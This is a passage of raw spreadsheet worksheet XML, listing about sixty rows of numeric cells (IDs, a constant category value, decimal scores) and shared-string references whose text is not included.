        <v>5125</v>
      </c>
      <c r="C6554">
        <v>5125</v>
      </c>
      <c r="D6554">
        <v>3</v>
      </c>
      <c r="E6554">
        <v>0.66619998216629028</v>
      </c>
      <c r="F6554" t="s">
        <v>10120</v>
      </c>
      <c r="G6554" t="s">
        <v>12963</v>
      </c>
      <c r="H6554" t="s">
        <v>12964</v>
      </c>
    </row>
    <row r="6555" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6555" s="1">
        <v>6553</v>
      </c>
      <c r="B6555">
        <v>4262</v>
      </c>
      <c r="C6555">
        <v>4262</v>
      </c>
      <c r="D6555">
        <v>3</v>
      </c>
      <c r="E6555">
        <v>0.59149998426437378</v>
      </c>
      <c r="F6555" t="s">
        <v>10120</v>
      </c>
      <c r="G6555" t="s">
        <v>12965</v>
      </c>
      <c r="H6555" t="s">
        <v>12966</v>
      </c>
    </row>
    <row r="6556" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6556" s="1">
        <v>6554</v>
      </c>
      <c r="B6556">
        <v>21</v>
      </c>
      <c r="C6556">
        <v>21</v>
      </c>
      <c r="D6556">
        <v>3</v>
      </c>
      <c r="E6556">
        <v>0.99599999189376831</v>
      </c>
      <c r="F6556" t="s">
        <v>10120</v>
      </c>
      <c r="G6556" t="s">
        <v>12967</v>
      </c>
      <c r="H6556" t="s">
        <v>12968</v>
      </c>
    </row>
    <row r="6557" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6557" s="1">
        <v>6555</v>
      </c>
      <c r="B6557">
        <v>20</v>
      </c>
      <c r="C6557">
        <v>20</v>
      </c>
      <c r="D6557">
        <v>3</v>
      </c>
      <c r="E6557">
        <v>0.99809998273849487</v>
      </c>
      <c r="F6557" t="s">
        <v>10120</v>
      </c>
      <c r="G6557" t="s">
        <v>12969</v>
      </c>
      <c r="H6557" t="s">
        <v>12970</v>
      </c>
    </row>
    <row r="6558" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6558" s="1">
        <v>6556</v>
      </c>
      <c r="B6558">
        <v>5413</v>
      </c>
      <c r="C6558">
        <v>5413</v>
      </c>
      <c r="D6558">
        <v>3</v>
      </c>
      <c r="E6558">
        <v>0.7720000147819519</v>
      </c>
      <c r="F6558" t="s">
        <v>10120</v>
      </c>
      <c r="G6558" t="s">
        <v>12971</v>
      </c>
      <c r="H6558" t="s">
        <v>12972</v>
      </c>
    </row>
    <row r="6559" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6559" s="1">
        <v>6557</v>
      </c>
      <c r="B6559">
        <v>4066</v>
      </c>
      <c r="C6559">
        <v>4066</v>
      </c>
      <c r="D6559">
        <v>3</v>
      </c>
      <c r="E6559">
        <v>0.5471000075340271</v>
      </c>
      <c r="F6559" t="s">
        <v>10120</v>
      </c>
      <c r="G6559" t="s">
        <v>12973</v>
      </c>
      <c r="H6559" t="s">
        <v>12974</v>
      </c>
    </row>
    <row r="6560" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6560" s="1">
        <v>6558</v>
      </c>
      <c r="B6560">
        <v>4260</v>
      </c>
      <c r="C6560">
        <v>4260</v>
      </c>
      <c r="D6560">
        <v>3</v>
      </c>
      <c r="E6560">
        <v>0.89980000257492065</v>
      </c>
      <c r="F6560" t="s">
        <v>10120</v>
      </c>
      <c r="G6560" t="s">
        <v>12975</v>
      </c>
      <c r="H6560" t="s">
        <v>12976</v>
      </c>
    </row>
    <row r="6561" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6561" s="1">
        <v>6559</v>
      </c>
      <c r="B6561">
        <v>571</v>
      </c>
      <c r="C6561">
        <v>571</v>
      </c>
      <c r="D6561">
        <v>3</v>
      </c>
      <c r="E6561">
        <v>0.72369998693466187</v>
      </c>
      <c r="F6561" t="s">
        <v>10120</v>
      </c>
      <c r="G6561" t="s">
        <v>12977</v>
      </c>
      <c r="H6561" t="s">
        <v>12978</v>
      </c>
    </row>
    <row r="6562" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6562" s="1">
        <v>6560</v>
      </c>
      <c r="B6562">
        <v>5496</v>
      </c>
      <c r="C6562">
        <v>5496</v>
      </c>
      <c r="D6562">
        <v>3</v>
      </c>
      <c r="E6562">
        <v>0.44920000433921808</v>
      </c>
      <c r="F6562" t="s">
        <v>10120</v>
      </c>
      <c r="G6562" t="s">
        <v>12979</v>
      </c>
      <c r="H6562" t="s">
        <v>12980</v>
      </c>
    </row>
    <row r="6563" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6563" s="1">
        <v>6561</v>
      </c>
      <c r="B6563">
        <v>580</v>
      </c>
      <c r="C6563">
        <v>580</v>
      </c>
      <c r="D6563">
        <v>3</v>
      </c>
      <c r="E6563">
        <v>0.71649998426437378</v>
      </c>
      <c r="F6563" t="s">
        <v>10120</v>
      </c>
      <c r="G6563" t="s">
        <v>12981</v>
      </c>
      <c r="H6563" t="s">
        <v>12982</v>
      </c>
    </row>
    <row r="6564" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6564" s="1">
        <v>6562</v>
      </c>
      <c r="B6564">
        <v>4067</v>
      </c>
      <c r="C6564">
        <v>4067</v>
      </c>
      <c r="D6564">
        <v>3</v>
      </c>
      <c r="E6564">
        <v>0.73680001497268677</v>
      </c>
      <c r="F6564" t="s">
        <v>10120</v>
      </c>
      <c r="G6564" t="s">
        <v>12983</v>
      </c>
      <c r="H6564" t="s">
        <v>12984</v>
      </c>
    </row>
    <row r="6565" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6565" s="1">
        <v>6563</v>
      </c>
      <c r="B6565">
        <v>4256</v>
      </c>
      <c r="C6565">
        <v>4256</v>
      </c>
      <c r="D6565">
        <v>3</v>
      </c>
      <c r="E6565">
        <v>0.97869998216629028</v>
      </c>
      <c r="F6565" t="s">
        <v>10120</v>
      </c>
      <c r="G6565" t="s">
        <v>12985</v>
      </c>
      <c r="H6565" t="s">
        <v>12986</v>
      </c>
    </row>
    <row r="6566" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6566" s="1">
        <v>6564</v>
      </c>
      <c r="B6566">
        <v>4255</v>
      </c>
      <c r="C6566">
        <v>4255</v>
      </c>
      <c r="D6566">
        <v>3</v>
      </c>
      <c r="E6566">
        <v>0.89819997549057007</v>
      </c>
      <c r="F6566" t="s">
        <v>10120</v>
      </c>
      <c r="G6566" t="s">
        <v>12987</v>
      </c>
      <c r="H6566" t="s">
        <v>12988</v>
      </c>
    </row>
    <row r="6567" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6567" s="1">
        <v>6565</v>
      </c>
      <c r="B6567">
        <v>19</v>
      </c>
      <c r="C6567">
        <v>19</v>
      </c>
      <c r="D6567">
        <v>3</v>
      </c>
      <c r="E6567">
        <v>0.79900002479553223</v>
      </c>
      <c r="F6567" t="s">
        <v>10120</v>
      </c>
      <c r="G6567" t="s">
        <v>12989</v>
      </c>
      <c r="H6567" t="s">
        <v>12990</v>
      </c>
    </row>
    <row r="6568" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6568" s="1">
        <v>6566</v>
      </c>
      <c r="B6568">
        <v>568</v>
      </c>
      <c r="C6568">
        <v>568</v>
      </c>
      <c r="D6568">
        <v>3</v>
      </c>
      <c r="E6568">
        <v>0.42899999022483831</v>
      </c>
      <c r="F6568" t="s">
        <v>10120</v>
      </c>
      <c r="G6568" t="s">
        <v>12991</v>
      </c>
      <c r="H6568" t="s">
        <v>12992</v>
      </c>
    </row>
    <row r="6569" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6569" s="1">
        <v>6567</v>
      </c>
      <c r="B6569">
        <v>4254</v>
      </c>
      <c r="C6569">
        <v>4254</v>
      </c>
      <c r="D6569">
        <v>3</v>
      </c>
      <c r="E6569">
        <v>0.5975000262260437</v>
      </c>
      <c r="F6569" t="s">
        <v>10120</v>
      </c>
      <c r="G6569" t="s">
        <v>12993</v>
      </c>
      <c r="H6569" t="s">
        <v>12994</v>
      </c>
    </row>
    <row r="6570" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6570" s="1">
        <v>6568</v>
      </c>
      <c r="B6570">
        <v>3</v>
      </c>
      <c r="C6570">
        <v>3</v>
      </c>
      <c r="D6570">
        <v>3</v>
      </c>
      <c r="E6570">
        <v>0.60699999332427979</v>
      </c>
      <c r="F6570" t="s">
        <v>10120</v>
      </c>
      <c r="G6570" t="s">
        <v>12995</v>
      </c>
      <c r="H6570" t="s">
        <v>12996</v>
      </c>
    </row>
    <row r="6571" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6571" s="1">
        <v>6569</v>
      </c>
      <c r="B6571">
        <v>16</v>
      </c>
      <c r="C6571">
        <v>16</v>
      </c>
      <c r="D6571">
        <v>3</v>
      </c>
      <c r="E6571">
        <v>0.41100001335144037</v>
      </c>
      <c r="F6571" t="s">
        <v>10120</v>
      </c>
      <c r="G6571" t="s">
        <v>12997</v>
      </c>
      <c r="H6571" t="s">
        <v>12998</v>
      </c>
    </row>
    <row r="6572" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6572" s="1">
        <v>6570</v>
      </c>
      <c r="B6572">
        <v>4075</v>
      </c>
      <c r="C6572">
        <v>4075</v>
      </c>
      <c r="D6572">
        <v>3</v>
      </c>
      <c r="E6572">
        <v>0.85250002145767212</v>
      </c>
      <c r="F6572" t="s">
        <v>10120</v>
      </c>
      <c r="G6572" t="s">
        <v>12999</v>
      </c>
      <c r="H6572" t="s">
        <v>13000</v>
      </c>
    </row>
    <row r="6573" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6573" s="1">
        <v>6571</v>
      </c>
      <c r="B6573">
        <v>4251</v>
      </c>
      <c r="C6573">
        <v>4251</v>
      </c>
      <c r="D6573">
        <v>3</v>
      </c>
      <c r="E6573">
        <v>0.57150000333786011</v>
      </c>
      <c r="F6573" t="s">
        <v>10120</v>
      </c>
      <c r="G6573" t="s">
        <v>13001</v>
      </c>
      <c r="H6573" t="s">
        <v>13002</v>
      </c>
    </row>
    <row r="6574" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6574" s="1">
        <v>6572</v>
      </c>
      <c r="B6574">
        <v>588</v>
      </c>
      <c r="C6574">
        <v>588</v>
      </c>
      <c r="D6574">
        <v>3</v>
      </c>
      <c r="E6574">
        <v>0.99029999971389771</v>
      </c>
      <c r="F6574" t="s">
        <v>10120</v>
      </c>
      <c r="G6574" t="s">
        <v>13003</v>
      </c>
      <c r="H6574" t="s">
        <v>13004</v>
      </c>
    </row>
    <row r="6575" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6575" s="1">
        <v>6573</v>
      </c>
      <c r="B6575">
        <v>4076</v>
      </c>
      <c r="C6575">
        <v>4076</v>
      </c>
      <c r="D6575">
        <v>3</v>
      </c>
      <c r="E6575">
        <v>0.56749999523162842</v>
      </c>
      <c r="F6575" t="s">
        <v>10120</v>
      </c>
      <c r="G6575" t="s">
        <v>13005</v>
      </c>
      <c r="H6575" t="s">
        <v>13006</v>
      </c>
    </row>
    <row r="6576" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6576" s="1">
        <v>6574</v>
      </c>
      <c r="B6576">
        <v>5548</v>
      </c>
      <c r="C6576">
        <v>5548</v>
      </c>
      <c r="D6576">
        <v>3</v>
      </c>
      <c r="E6576">
        <v>0.3871999979019165</v>
      </c>
      <c r="F6576" t="s">
        <v>10120</v>
      </c>
      <c r="G6576" t="s">
        <v>13007</v>
      </c>
      <c r="H6576" t="s">
        <v>13008</v>
      </c>
    </row>
    <row r="6577" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6577" s="1">
        <v>6575</v>
      </c>
      <c r="B6577">
        <v>4246</v>
      </c>
      <c r="C6577">
        <v>4246</v>
      </c>
      <c r="D6577">
        <v>3</v>
      </c>
      <c r="E6577">
        <v>0.57279998064041138</v>
      </c>
      <c r="F6577" t="s">
        <v>10120</v>
      </c>
      <c r="G6577" t="s">
        <v>13009</v>
      </c>
      <c r="H6577" t="s">
        <v>13010</v>
      </c>
    </row>
    <row r="6578" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6578" s="1">
        <v>6576</v>
      </c>
      <c r="B6578">
        <v>4077</v>
      </c>
      <c r="C6578">
        <v>4077</v>
      </c>
      <c r="D6578">
        <v>3</v>
      </c>
      <c r="E6578">
        <v>0.58420002460479736</v>
      </c>
      <c r="F6578" t="s">
        <v>10120</v>
      </c>
      <c r="G6578" t="s">
        <v>13011</v>
      </c>
      <c r="H6578" t="s">
        <v>13012</v>
      </c>
    </row>
    <row r="6579" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6579" s="1">
        <v>6577</v>
      </c>
      <c r="B6579">
        <v>4245</v>
      </c>
      <c r="C6579">
        <v>4245</v>
      </c>
      <c r="D6579">
        <v>3</v>
      </c>
      <c r="E6579">
        <v>0.95740002393722534</v>
      </c>
      <c r="F6579" t="s">
        <v>10120</v>
      </c>
      <c r="G6579" t="s">
        <v>13013</v>
      </c>
      <c r="H6579" t="s">
        <v>13014</v>
      </c>
    </row>
    <row r="6580" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6580" s="1">
        <v>6578</v>
      </c>
      <c r="B6580">
        <v>589</v>
      </c>
      <c r="C6580">
        <v>589</v>
      </c>
      <c r="D6580">
        <v>3</v>
      </c>
      <c r="E6580">
        <v>0.53030002117156982</v>
      </c>
      <c r="F6580" t="s">
        <v>10120</v>
      </c>
      <c r="G6580" t="s">
        <v>13015</v>
      </c>
      <c r="H6580" t="s">
        <v>13016</v>
      </c>
    </row>
    <row r="6581" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6581" s="1">
        <v>6579</v>
      </c>
      <c r="B6581">
        <v>5501</v>
      </c>
      <c r="C6581">
        <v>5501</v>
      </c>
      <c r="D6581">
        <v>3</v>
      </c>
      <c r="E6581">
        <v>0.70010000467300415</v>
      </c>
      <c r="F6581" t="s">
        <v>10120</v>
      </c>
      <c r="G6581" t="s">
        <v>13017</v>
      </c>
      <c r="H6581" t="s">
        <v>13018</v>
      </c>
    </row>
    <row r="6582" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6582" s="1">
        <v>6580</v>
      </c>
      <c r="B6582">
        <v>4244</v>
      </c>
      <c r="C6582">
        <v>4244</v>
      </c>
      <c r="D6582">
        <v>3</v>
      </c>
      <c r="E6582">
        <v>0.99279999732971191</v>
      </c>
      <c r="F6582" t="s">
        <v>10120</v>
      </c>
      <c r="G6582" t="s">
        <v>13019</v>
      </c>
      <c r="H6582" t="s">
        <v>13020</v>
      </c>
    </row>
    <row r="6583" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6583" s="1">
        <v>6581</v>
      </c>
      <c r="B6583">
        <v>5499</v>
      </c>
      <c r="C6583">
        <v>5499</v>
      </c>
      <c r="D6583">
        <v>3</v>
      </c>
      <c r="E6583">
        <v>0.9771999716758728</v>
      </c>
      <c r="F6583" t="s">
        <v>10120</v>
      </c>
      <c r="G6583" t="s">
        <v>13021</v>
      </c>
      <c r="H6583" t="s">
        <v>13022</v>
      </c>
    </row>
    <row r="6584" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6584" s="1">
        <v>6582</v>
      </c>
      <c r="B6584">
        <v>4264</v>
      </c>
      <c r="C6584">
        <v>4264</v>
      </c>
      <c r="D6584">
        <v>3</v>
      </c>
      <c r="E6584">
        <v>0.90439999103546143</v>
      </c>
      <c r="F6584" t="s">
        <v>10120</v>
      </c>
      <c r="G6584" t="s">
        <v>13023</v>
      </c>
      <c r="H6584" t="s">
        <v>13024</v>
      </c>
    </row>
    <row r="6585" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6585" s="1">
        <v>6583</v>
      </c>
      <c r="B6585">
        <v>4266</v>
      </c>
      <c r="C6585">
        <v>4266</v>
      </c>
      <c r="D6585">
        <v>3</v>
      </c>
      <c r="E6585">
        <v>0.50749999284744263</v>
      </c>
      <c r="F6585" t="s">
        <v>10120</v>
      </c>
      <c r="G6585" t="s">
        <v>13025</v>
      </c>
      <c r="H6585" t="s">
        <v>13026</v>
      </c>
    </row>
    <row r="6586" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6586" s="1">
        <v>6584</v>
      </c>
      <c r="B6586">
        <v>567</v>
      </c>
      <c r="C6586">
        <v>567</v>
      </c>
      <c r="D6586">
        <v>3</v>
      </c>
      <c r="E6586">
        <v>0.98629999160766602</v>
      </c>
      <c r="F6586" t="s">
        <v>10120</v>
      </c>
      <c r="G6586" t="s">
        <v>13027</v>
      </c>
      <c r="H6586" t="s">
        <v>13028</v>
      </c>
    </row>
    <row r="6587" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6587" s="1">
        <v>6585</v>
      </c>
      <c r="B6587">
        <v>5470</v>
      </c>
      <c r="C6587">
        <v>5470</v>
      </c>
      <c r="D6587">
        <v>3</v>
      </c>
      <c r="E6587">
        <v>0.555899977684021</v>
      </c>
      <c r="F6587" t="s">
        <v>10120</v>
      </c>
      <c r="G6587" t="s">
        <v>13029</v>
      </c>
      <c r="H6587" t="s">
        <v>13030</v>
      </c>
    </row>
    <row r="6588" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6588" s="1">
        <v>6586</v>
      </c>
      <c r="B6588">
        <v>4108</v>
      </c>
      <c r="C6588">
        <v>4108</v>
      </c>
      <c r="D6588">
        <v>3</v>
      </c>
      <c r="E6588">
        <v>0.84399998188018799</v>
      </c>
      <c r="F6588" t="s">
        <v>10120</v>
      </c>
      <c r="G6588" t="s">
        <v>13031</v>
      </c>
      <c r="H6588" t="s">
        <v>12243</v>
      </c>
    </row>
    <row r="6589" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6589" s="1">
        <v>6587</v>
      </c>
      <c r="B6589">
        <v>5472</v>
      </c>
      <c r="C6589">
        <v>5472</v>
      </c>
      <c r="D6589">
        <v>3</v>
      </c>
      <c r="E6589">
        <v>0.70759999752044678</v>
      </c>
      <c r="F6589" t="s">
        <v>10120</v>
      </c>
      <c r="G6589" t="s">
        <v>13032</v>
      </c>
      <c r="H6589" t="s">
        <v>13033</v>
      </c>
    </row>
    <row r="6590" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6590" s="1">
        <v>6588</v>
      </c>
      <c r="B6590">
        <v>5476</v>
      </c>
      <c r="C6590">
        <v>5476</v>
      </c>
      <c r="D6590">
        <v>3</v>
      </c>
      <c r="E6590">
        <v>0.98909997940063477</v>
      </c>
      <c r="F6590" t="s">
        <v>10120</v>
      </c>
      <c r="G6590" t="s">
        <v>13034</v>
      </c>
      <c r="H6590" t="s">
        <v>13035</v>
      </c>
    </row>
    <row r="6591" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6591" s="1">
        <v>6589</v>
      </c>
      <c r="B6591">
        <v>4301</v>
      </c>
      <c r="C6591">
        <v>4301</v>
      </c>
      <c r="D6591">
        <v>3</v>
      </c>
      <c r="E6591">
        <v>0.99790000915527344</v>
      </c>
      <c r="F6591" t="s">
        <v>10120</v>
      </c>
      <c r="G6591" t="s">
        <v>13036</v>
      </c>
      <c r="H6591" t="s">
        <v>13037</v>
      </c>
    </row>
    <row r="6592" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6592" s="1">
        <v>6590</v>
      </c>
      <c r="B6592">
        <v>4300</v>
      </c>
      <c r="C6592">
        <v>4300</v>
      </c>
      <c r="D6592">
        <v>3</v>
      </c>
      <c r="E6592">
        <v>0.97839999198913574</v>
      </c>
      <c r="F6592" t="s">
        <v>10120</v>
      </c>
      <c r="G6592" t="s">
        <v>13038</v>
      </c>
      <c r="H6592" t="s">
        <v>13039</v>
      </c>
    </row>
    <row r="6593" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6593" s="1">
        <v>6591</v>
      </c>
      <c r="B6593">
        <v>5550</v>
      </c>
      <c r="C6593">
        <v>5550</v>
      </c>
      <c r="D6593">
        <v>3</v>
      </c>
      <c r="E6593">
        <v>0.67290002107620239</v>
      </c>
      <c r="F6593" t="s">
        <v>10120</v>
      </c>
      <c r="G6593" t="s">
        <v>13040</v>
      </c>
      <c r="H6593" t="s">
        <v>13041</v>
      </c>
    </row>
    <row r="6594" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6594" s="1">
        <v>6592</v>
      </c>
      <c r="B6594">
        <v>5477</v>
      </c>
      <c r="C6594">
        <v>5477</v>
      </c>
      <c r="D6594">
        <v>3</v>
      </c>
      <c r="E6594">
        <v>0.6468999981880188</v>
      </c>
      <c r="F6594" t="s">
        <v>10120</v>
      </c>
      <c r="G6594" t="s">
        <v>13042</v>
      </c>
      <c r="H6594" t="s">
        <v>13043</v>
      </c>
    </row>
    <row r="6595" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6595" s="1">
        <v>6593</v>
      </c>
      <c r="B6595">
        <v>540</v>
      </c>
      <c r="C6595">
        <v>540</v>
      </c>
      <c r="D6595">
        <v>3</v>
      </c>
      <c r="E6595">
        <v>0.49050000309944147</v>
      </c>
      <c r="F6595" t="s">
        <v>10120</v>
      </c>
      <c r="G6595" t="s">
        <v>13044</v>
      </c>
      <c r="H6595" t="s">
        <v>13045</v>
      </c>
    </row>
    <row r="6596" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6596" s="1">
        <v>6594</v>
      </c>
      <c r="B6596">
        <v>4286</v>
      </c>
      <c r="C6596">
        <v>4286</v>
      </c>
      <c r="D6596">
        <v>3</v>
      </c>
      <c r="E6596">
        <v>0.70149999856948853</v>
      </c>
      <c r="F6596" t="s">
        <v>10120</v>
      </c>
      <c r="G6596" t="s">
        <v>13046</v>
      </c>
      <c r="H6596" t="s">
        <v>13047</v>
      </c>
    </row>
    <row r="6597" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6597" s="1">
        <v>6595</v>
      </c>
      <c r="B6597">
        <v>4285</v>
      </c>
      <c r="C6597">
        <v>4285</v>
      </c>
      <c r="D6597">
        <v>3</v>
      </c>
      <c r="E6597">
        <v>0.71130001544952393</v>
      </c>
      <c r="F6597" t="s">
        <v>10120</v>
      </c>
      <c r="G6597" t="s">
        <v>13048</v>
      </c>
      <c r="H6597" t="s">
        <v>13049</v>
      </c>
    </row>
    <row r="6598" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6598" s="1">
        <v>6596</v>
      </c>
      <c r="B6598">
        <v>4284</v>
      </c>
      <c r="C6598">
        <v>4284</v>
      </c>
      <c r="D6598">
        <v>3</v>
      </c>
      <c r="E6598">
        <v>0.9976000189781189</v>
      </c>
      <c r="F6598" t="s">
        <v>10120</v>
      </c>
      <c r="G6598" t="s">
        <v>13050</v>
      </c>
      <c r="H6598" t="s">
        <v>13051</v>
      </c>
    </row>
    <row r="6599" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6599" s="1">
        <v>6597</v>
      </c>
      <c r="B6599">
        <v>4279</v>
      </c>
      <c r="C6599">
        <v>4279</v>
      </c>
      <c r="D6599">
        <v>3</v>
      </c>
      <c r="E6599">
        <v>0.82039999961853027</v>
      </c>
      <c r="F6599" t="s">
        <v>10120</v>
      </c>
      <c r="G6599" t="s">
        <v>13052</v>
      </c>
      <c r="H6599" t="s">
        <v>13053</v>
      </c>
    </row>
    <row r="6600" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6600" s="1">
        <v>6598</v>
      </c>
      <c r="B6600">
        <v>5479</v>
      </c>
      <c r="C6600">
        <v>5479</v>
      </c>
      <c r="D6600">
        <v>3</v>
      </c>
      <c r="E6600">
        <v>0.44800001382827759</v>
      </c>
      <c r="F6600" t="s">
        <v>10120</v>
      </c>
      <c r="G6600" t="s">
        <v>13054</v>
      </c>
      <c r="H6600" t="s">
        <v>13055</v>
      </c>
    </row>
    <row r="6601" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6601" s="1">
        <v>6599</v>
      </c>
      <c r="B6601">
        <v>4278</v>
      </c>
      <c r="C6601">
        <v>4278</v>
      </c>
      <c r="D6601">
        <v>3</v>
      </c>
      <c r="E6601">
        <v>0.94169998168945313</v>
      </c>
      <c r="F6601" t="s">
        <v>10120</v>
      </c>
      <c r="G6601" t="s">
        <v>13056</v>
      </c>
      <c r="H6601" t="s">
        <v>13057</v>
      </c>
    </row>
    <row r="6602" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6602" s="1">
        <v>6600</v>
      </c>
      <c r="B6602">
        <v>4277</v>
      </c>
      <c r="C6602">
        <v>4277</v>
      </c>
      <c r="D6602">
        <v>3</v>
      </c>
      <c r="E6602">
        <v>0.35220000147819519</v>
      </c>
      <c r="F6602" t="s">
        <v>10120</v>
      </c>
      <c r="G6602" t="s">
        <v>13058</v>
      </c>
      <c r="H6602" t="s">
        <v>13059</v>
      </c>
    </row>
    <row r="6603" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6603" s="1">
        <v>6601</v>
      </c>
      <c r="B6603">
        <v>541</v>
      </c>
      <c r="C6603">
        <v>541</v>
      </c>
      <c r="D6603">
        <v>3</v>
      </c>
      <c r="E6603">
        <v>0.49050000309944147</v>
      </c>
      <c r="F6603" t="s">
        <v>10120</v>
      </c>
      <c r="G6603" t="s">
        <v>13060</v>
      </c>
      <c r="H6603" t="s">
        <v>13045</v>
      </c>
    </row>
    <row r="6604" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6604" s="1">
        <v>6602</v>
      </c>
      <c r="B6604">
        <v>548</v>
      </c>
      <c r="C6604">
        <v>548</v>
      </c>
      <c r="D6604">
        <v>3</v>
      </c>
      <c r="E6604">
        <v>0.62230002880096436</v>
      </c>
      <c r="F6604" t="s">
        <v>10120</v>
      </c>
      <c r="G6604" t="s">
        <v>13061</v>
      </c>
      <c r="H6604" t="s">
        <v>13062</v>
      </c>
    </row>
    <row r="6605" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6605" s="1">
        <v>6603</v>
      </c>
      <c r="B6605">
        <v>27</v>
      </c>
      <c r="C6605">
        <v>27</v>
      </c>
      <c r="D6605">
        <v>3</v>
      </c>
      <c r="E6605">
        <v>0.88429999351501465</v>
      </c>
      <c r="F6605" t="s">
        <v>10120</v>
      </c>
      <c r="G6605" t="s">
        <v>13063</v>
      </c>
      <c r="H6605" t="s">
        <v>13064</v>
      </c>
    </row>
    <row r="6606" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6606" s="1">
        <v>6604</v>
      </c>
      <c r="B6606">
        <v>4275</v>
      </c>
      <c r="C6606">
        <v>4275</v>
      </c>
      <c r="D6606">
        <v>3</v>
      </c>
      <c r="E6606">
        <v>0.56770002841949463</v>
      </c>
      <c r="F6606" t="s">
        <v>10120</v>
      </c>
      <c r="G6606" t="s">
        <v>13065</v>
      </c>
      <c r="H6606" t="s">
        <v>13066</v>
      </c>
    </row>
    <row r="6607" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6607" s="1">
        <v>6605</v>
      </c>
      <c r="B6607">
        <v>555</v>
      </c>
      <c r="C6607">
        <v>555</v>
      </c>
      <c r="D6607">
        <v>3</v>
      </c>
      <c r="E6607">
        <v>0.99430000782012939</v>
      </c>
      <c r="F6607" t="s">
        <v>10120</v>
      </c>
      <c r="G6607" t="s">
        <v>13067</v>
      </c>
      <c r="H6607" t="s">
        <v>13068</v>
      </c>
    </row>
    <row r="6608" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6608" s="1">
        <v>6606</v>
      </c>
      <c r="B6608">
        <v>26</v>
      </c>
      <c r="C6608">
        <v>26</v>
      </c>
      <c r="D6608">
        <v>3</v>
      </c>
      <c r="E6608">
        <v>0.92760002613067627</v>
      </c>
      <c r="F6608" t="s">
        <v>10120</v>
      </c>
      <c r="G6608" t="s">
        <v>13069</v>
      </c>
      <c r="H6608" t="s">
        <v>13070</v>
      </c>
    </row>
    <row r="6609" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6609" s="1">
        <v>6607</v>
      </c>
      <c r="B6609">
        <v>557</v>
      </c>
      <c r="C6609">
        <v>557</v>
      </c>
      <c r="D6609">
        <v>3</v>
      </c>
      <c r="E6609">
        <v>0.99720001220703125</v>
      </c>
      <c r="F6609" t="s">
        <v>10120</v>
      </c>
      <c r="G6609" t="s">
        <v>13071</v>
      </c>
      <c r="H6609" t="s">
        <v>13072</v>
      </c>
    </row>
    <row r="6610" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6610" s="1">
        <v>6608</v>
      </c>
      <c r="B6610">
        <v>5485</v>
      </c>
      <c r="C6610">
        <v>5485</v>
      </c>
      <c r="D6610">
        <v>3</v>
      </c>
      <c r="E6610">
        <v>0.9570000171661377</v>
      </c>
      <c r="F6610" t="s">
        <v>10120</v>
      </c>
      <c r="G6610" t="s">
        <v>13073</v>
      </c>
      <c r="H6610" t="s">
        <v>13074</v>
      </c>
    </row>
    <row r="6611" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6611" s="1">
        <v>6609</v>
      </c>
      <c r="B6611">
        <v>4273</v>
      </c>
      <c r="C6611">
        <v>4273</v>
      </c>
      <c r="D6611">
        <v>3</v>
      </c>
      <c r="E6611">
        <v>0.79339998960494995</v>
      </c>
      <c r="F6611" t="s">
        <v>10120</v>
      </c>
      <c r="G6611" t="s">
        <v>13075</v>
      </c>
      <c r="H6611" t="s">
        <v>13076</v>
      </c>
    </row>
    <row r="6612" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6612" s="1">
        <v>6610</v>
      </c>
      <c r="B6612">
        <v>5487</v>
      </c>
      <c r="C6612">
        <v>5487</v>
      </c>
      <c r="D6612">
        <v>3</v>
      </c>
      <c r="E6612">
        <v>0.98390001058578491</v>
      </c>
      <c r="F6612" t="s">
        <v>10120</v>
      </c>
